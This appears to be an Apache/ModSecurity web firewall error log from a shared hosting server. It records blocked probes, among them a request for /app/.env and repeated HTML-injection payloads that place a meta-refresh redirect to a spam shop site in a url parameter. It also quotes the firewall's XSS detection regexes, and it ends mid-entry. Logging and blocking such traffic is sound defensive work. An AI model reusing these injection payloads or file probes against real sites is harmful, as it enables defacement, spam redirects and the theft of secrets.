[Tue May 12 02:00:50.890104 2026] [security2:error] [pid 1709071:tid 1709095] [client 43.153.35.128:51664] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agJtsrvMumyrWMfSu7qfmgAAAMg"], referer: https://www.castiglionecorporatefinance.fr/embed/
[Tue May 12 02:01:02.912387 2026] [security2:error] [pid 1707624:tid 1707692] [client 176.65.139.229:33052] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/app/.env"] [unique_id "agJtvrOxS7i6i_mT2NK-BAAAAEo"]
[Tue May 12 02:01:02.912637 2026] [security2:error] [pid 1707624:tid 1707692] [client 176.65.139.229:33052] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/app/.env"] [unique_id "agJtvrOxS7i6i_mT2NK-BAAAAEo"]
[Tue May 12 02:01:02.914099 2026] [security2:error] [pid 1707624:tid 1707692] [client 176.65.139.229:33052] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agJtvrOxS7i6i_mT2NK-BAAAAEo"]
[Tue May 12 02:01:09.399781 2026] [autoindex:error] [pid 1695975:tid 1695994] [client 20.151.0.198:35741] AH01276: Cannot serve directory /home/letamsga/public_html/.well-known/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:01:24.200542 2026] [core:crit] [pid 1730175:tid 1730193] (13)Permission denied: [client 8.229.56.56:36584] AH00529: /home/krakouka/public_html/wordpress/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home/krakouka/public_html/wordpress/' is executable, referer: http://krakoukas.com/wordpress/
[Tue May 12 02:01:36.448384 2026] [security2:error] [pid 1691274:tid 1691277] [client 43.164.190.28:54274] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/wp-content/uploads/2019/08/CentaureaPresent.pdf"] [unique_id "agJt4FfdQaraX_prmqcU1gAAAAA"]
[Tue May 12 02:01:37.417557 2026] [security2:error] [pid 1730207:tid 1730220] [client 27.78.84.116:61603] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt4Tue9Sp-pIv_Bb6FTwAAAUs"]
[Tue May 12 02:01:37.422260 2026] [security2:error] [pid 1730207:tid 1730220] [client 27.78.84.116:61603] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https:/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt4Tue9Sp-pIv_Bb6FTwAAAUs"]
[Tue May 12 02:01:37.422437 2026] [security2:error] [pid 1730207:tid 1730220] [client 27.78.84.116:61603] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt4Tue9Sp-pIv_Bb6FTwAAAUs"]
[Tue May 12 02:01:37.422711 2026] [security2:error] [pid 1730207:tid 1730220] [client 27.78.84.116:61603] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"]  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt4Tue9Sp-pIv_Bb6FTwAAAUs"]
[Tue May 12 02:01:37.423383 2026] [security2:error] [pid 1730207:tid 1730220] [client 27.78.84.116:61603] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "C [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt4Tue9Sp-pIv_Bb6FTwAAAUs"]
[Tue May 12 02:01:37.423799 2026] [security2:error] [pid 1730207:tid 1730220] [client 27.78.84.116:61603] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt4Tue9Sp-pIv_Bb6FTwAAAUs"]
[Tue May 12 02:01:37.424047 2026] [security2:error] [pid 1730207:tid 1730220] [client 27.78.84.116:61603] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt4Tue9Sp-pIv_Bb6FTwAAAUs"]
[Tue May 12 02:01:47.599356 2026] [security2:error] [pid 1730175:tid 1730185] [client 27.78.84.116:62290] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt63o6NvB9WXx5V-5w6wAAAQg"]
[Tue May 12 02:01:47.599943 2026] [security2:error] [pid 1730175:tid 1730185] [client 27.78.84.116:62290] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https:/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt63o6NvB9WXx5V-5w6wAAAQg"]
[Tue May 12 02:01:47.600432 2026] [security2:error] [pid 1730175:tid 1730185] [client 27.78.84.116:62290] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt63o6NvB9WXx5V-5w6wAAAQg"]
[Tue May 12 02:01:47.601937 2026] [security2:error] [pid 1730175:tid 1730185] [client 27.78.84.116:62290] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"]  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt63o6NvB9WXx5V-5w6wAAAQg"]
[Tue May 12 02:01:47.602139 2026] [security2:error] [pid 1730175:tid 1730185] [client 27.78.84.116:62290] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "C [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt63o6NvB9WXx5V-5w6wAAAQg"]
[Tue May 12 02:01:47.602574 2026] [security2:error] [pid 1730175:tid 1730185] [client 27.78.84.116:62290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt63o6NvB9WXx5V-5w6wAAAQg"]
[Tue May 12 02:01:47.602923 2026] [security2:error] [pid 1730175:tid 1730185] [client 27.78.84.116:62290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt63o6NvB9WXx5V-5w6wAAAQg"]
[Tue May 12 02:01:55.609857 2026] [autoindex:error] [pid 1730175:tid 1730200] [client 20.151.0.198:35740] AH01276: Cannot serve directory /home/letamsga/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:01:56.321993 2026] [security2:error] [pid 1695975:tid 1695983] [client 27.78.84.116:62975] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt9NVI9ymHBxup74-DZAAAAIU"]
[Tue May 12 02:01:56.331752 2026] [security2:error] [pid 1695975:tid 1695983] [client 27.78.84.116:62975] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https:/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt9NVI9ymHBxup74-DZAAAAIU"]
[Tue May 12 02:01:56.335821 2026] [security2:error] [pid 1695975:tid 1695983] [client 27.78.84.116:62975] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt9NVI9ymHBxup74-DZAAAAIU"]
[Tue May 12 02:01:56.339585 2026] [security2:error] [pid 1695975:tid 1695983] [client 27.78.84.116:62975] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"]  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt9NVI9ymHBxup74-DZAAAAIU"]
[Tue May 12 02:01:56.339784 2026] [security2:error] [pid 1695975:tid 1695983] [client 27.78.84.116:62975] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh 